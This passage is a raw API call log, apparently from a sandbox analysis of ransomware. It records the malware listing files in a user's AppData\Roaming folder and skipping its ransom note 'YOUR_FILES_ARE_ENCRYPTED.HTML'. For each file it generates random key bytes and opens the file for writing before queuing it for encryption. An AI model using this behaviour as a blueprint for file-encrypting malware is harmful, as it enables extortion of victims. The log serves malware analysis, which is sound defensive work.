returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="3D") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="06") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="81") returned 2 [0165.684] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="E9") returned 2 [0165.684] wsprintfW (in: 
param_1=0x4ebdaa2, param_2="%02X" | out: param_1="4A") returned 2 [0165.685] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="82") returned 2 [0165.685] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="97") returned 2 [0165.685] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="35") returned 2 [0165.685] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="38") returned 2 [0165.685] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\qoQusl.m4a" [0165.685] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.685] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0165.697] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd44feb60, ftCreationTime.dwHighDateTime=0x1d7d9be, ftLastAccessTime.dwLowDateTime=0x6bf91bf0, ftLastAccessTime.dwHighDateTime=0x1d7dac1, ftLastWriteTime.dwLowDateTime=0x6bf91bf0, ftLastWriteTime.dwHighDateTime=0x1d7dac1, nFileSizeHigh=0x0, nFileSizeLow=0x979a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="QSp2x.ods", cAlternateFileName="")) returned 1 [0165.697] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods") returned 49 [0165.697] lstrcmpW (lpString1="QSp2x.ods", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.697] PathFindExtensionW (pszPath="QSp2x.ods") returned=".ods" [0165.697] lstrlenW (lpString=".ods") returned 4 [0165.697] PathFindExtensionW (pszPath="QSp2x.ods") returned=".ods" [0165.697] 
SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.697] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\qsp2x.ods"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0165.698] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=38810) returned 1 [0165.698] GetProcessHeap () returned 0x270000 [0165.698] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x73e0048 [0165.699] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="07") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="4E") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="09") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="C1") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="A7") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="7E") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="31") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="B3") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="02") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="DE") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="15") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="E4") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="DE") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="19") returned 2 [0165.699] 
wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="2F") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="C0") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="85") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="64") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="B4") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="AF") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="FC") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="9B") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="60") returned 2 [0165.699] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="35") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="47") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="9B") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="62") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="74") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="48") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="5B") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="BC") returned 2 [0165.700] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1F") returned 2 [0165.700] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\QSp2x.ods" [0165.700] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, 
CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.700] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0165.705] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x36a525f0, ftCreationTime.dwHighDateTime=0x1d7db6d, ftLastAccessTime.dwLowDateTime=0x9f4aaff0, ftLastAccessTime.dwHighDateTime=0x1d7ddff, ftLastWriteTime.dwLowDateTime=0x9f4aaff0, ftLastWriteTime.dwHighDateTime=0x1d7ddff, nFileSizeHigh=0x0, nFileSizeLow=0x63f7, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="RBbwYGkm_WNBvZLE_av.png", cAlternateFileName="RBBWYG~1.PNG")) returned 1 [0165.708] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png") returned 63 [0165.708] lstrcmpW (lpString1="RBbwYGkm_WNBvZLE_av.png", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.708] PathFindExtensionW (pszPath="RBbwYGkm_WNBvZLE_av.png") returned=".png" [0165.708] lstrlenW (lpString=".png") returned 4 [0165.708] PathFindExtensionW (pszPath="RBbwYGkm_WNBvZLE_av.png") returned=".png" [0165.708] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.708] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\rbbwygkm_wnbvzle_av.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5e4 [0165.709] GetFileSizeEx (in: hFile=0x5e4, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=25591) returned 1 [0165.709] GetProcessHeap () returned 0x270000 [0165.709] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) 
returned 0x73e0048 [0165.709] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="6E") returned 2 [0165.709] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="39") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="80") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="6B") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="12") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="DF") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="61") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="A0") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="0D") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A3") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="5C") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="AF") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="2E") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="3A") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="3E") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="2C") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="06") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="E4") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="93") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="F3") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="58") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda8a, 
param_2="%02X" | out: param_1="73") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="A6") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="03") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="5B") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="58") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="F0") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="BC") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="56") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="33") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="B5") returned 2 [0165.710] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="3A") returned 2 [0165.711] lstrcpyW (in: lpString1=0x73f00fc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\RBbwYGkm_WNBvZLE_av.png" [0165.711] CreateIoCompletionPort (FileHandle=0x5e4, ExistingCompletionPort=0x3a0, CompletionKey=0x73e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.711] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x73e0048, lpOverlapped=0x73e0048) returned 1 [0165.739] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x42960a20, ftCreationTime.dwHighDateTime=0x1d7e778, ftLastAccessTime.dwLowDateTime=0xf4762c00, ftLastAccessTime.dwHighDateTime=0x1d7e789, ftLastWriteTime.dwLowDateTime=0xf4762c00, ftLastWriteTime.dwHighDateTime=0x1d7e789, nFileSizeHigh=0x0, 
nFileSizeLow=0x107b5, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Ro81j5KYV.docx", cAlternateFileName="RO81J5~1.DOC")) returned 1 [0165.739] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx") returned 54 [0165.739] lstrcmpW (lpString1="Ro81j5KYV.docx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.739] PathFindExtensionW (pszPath="Ro81j5KYV.docx") returned=".docx" [0165.739] lstrlenW (lpString=".docx") returned 5 [0165.739] PathFindExtensionW (pszPath="Ro81j5KYV.docx") returned=".docx" [0165.739] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.739] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\ro81j5kyv.docx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5b8 [0165.740] GetFileSizeEx (in: hFile=0x5b8, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=67509) returned 1 [0165.740] GetProcessHeap () returned 0x270000 [0165.740] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0165.744] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="04") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="92") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="8C") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="5A") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="CB") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="A0") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="0C") returned 2 [0165.744] wsprintfW (in: 
param_1=0x4ebda52, param_2="%02X" | out: param_1="C2") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="AD") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="C6") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="1D") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="C7") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="6F") returned 2 [0165.744] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="E3") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="A4") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="7B") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E5") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="E8") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="4D") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="CE") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="C0") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="BF") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="17") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="75") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="93") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="72") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="11") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="F8") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D0") returned 2 
[0165.745] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B6") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="B3") returned 2 [0165.745] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="0C") returned 2 [0165.746] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ro81j5KYV.docx" [0165.746] CreateIoCompletionPort (FileHandle=0x5b8, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.746] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0165.747] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x20ddf0a0, ftCreationTime.dwHighDateTime=0x1d7de68, ftLastAccessTime.dwLowDateTime=0x6d8163b0, ftLastAccessTime.dwHighDateTime=0x1d7df21, ftLastWriteTime.dwLowDateTime=0x6d8163b0, ftLastWriteTime.dwHighDateTime=0x1d7df21, nFileSizeHigh=0x0, nFileSizeLow=0x253a, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="s1X1py5zOF.pptx", cAlternateFileName="S1X1PY~1.PPT")) returned 1 [0165.747] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx") returned 55 [0165.747] lstrcmpW (lpString1="s1X1py5zOF.pptx", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.747] PathFindExtensionW (pszPath="s1X1py5zOF.pptx") returned=".pptx" [0165.747] lstrlenW (lpString=".pptx") returned 5 [0165.747] PathFindExtensionW (pszPath="s1X1py5zOF.pptx") returned=".pptx" [0165.747] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) 
returned 1 [0165.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\s1x1py5zof.pptx"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0165.748] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=9530) returned 1 [0165.748] GetProcessHeap () returned 0x270000 [0165.748] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0165.748] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="9F") returned 2 [0165.748] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="AE") returned 2 [0165.748] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="2E") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="AD") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="CC") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D8") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="68") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="98") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="B2") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="68") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="78") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8B") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="EF") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="E1") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="33") returned 2 [0165.749] 
wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="68") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="01") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="9D") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="1F") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="6D") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="A9") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="DA") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="63") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="D7") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="3A") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="DF") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="6A") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="D9") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="C4") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="A2") returned 2 [0165.749] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="CF") returned 2 [0165.750] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="16") returned 2 [0165.750] lstrcpyW (in: lpString1=0x76a00bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\s1X1py5zOF.pptx" [0165.750] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x7690008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0165.750] 
PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7690008, lpOverlapped=0x7690008) returned 1 [0165.763] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x2048c310, ftCreationTime.dwHighDateTime=0x1d7e0b9, ftLastAccessTime.dwLowDateTime=0x682bf4a0, ftLastAccessTime.dwHighDateTime=0x1d7e293, ftLastWriteTime.dwLowDateTime=0x682bf4a0, ftLastWriteTime.dwHighDateTime=0x1d7e293, nFileSizeHigh=0x0, nFileSizeLow=0xada7, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="UO5iMAxdE5LXqP1Rk D1.gif", cAlternateFileName="UO5IMA~1.GIF")) returned 1 [0165.763] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif") returned 64 [0165.763] lstrcmpW (lpString1="UO5iMAxdE5LXqP1Rk D1.gif", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0165.763] PathFindExtensionW (pszPath="UO5iMAxdE5LXqP1Rk D1.gif") returned=".gif" [0165.763] lstrlenW (lpString=".gif") returned 4 [0165.763] PathFindExtensionW (pszPath="UO5iMAxdE5LXqP1Rk D1.gif") returned=".gif" [0165.763] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0165.763] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\UO5iMAxdE5LXqP1Rk D1.gif" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\uo5imaxde5lxqp1rk d1.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0165.764] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=44455) returned 1 [0165.764] GetProcessHeap () returned 0x270000 [0165.764] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7690008 [0165.765] wsprintfW (in: param_1=0x4ebda36, 
param_2="%02X" | out: param_1="8A") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="50") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E0") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="24") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="10") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="1A") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="76") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="C7") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="89") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="2D") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="4F") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="59") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="86") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="22") returned 2 [0165.765] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B6") returned 2 [0165.765] wsprintfW (in: 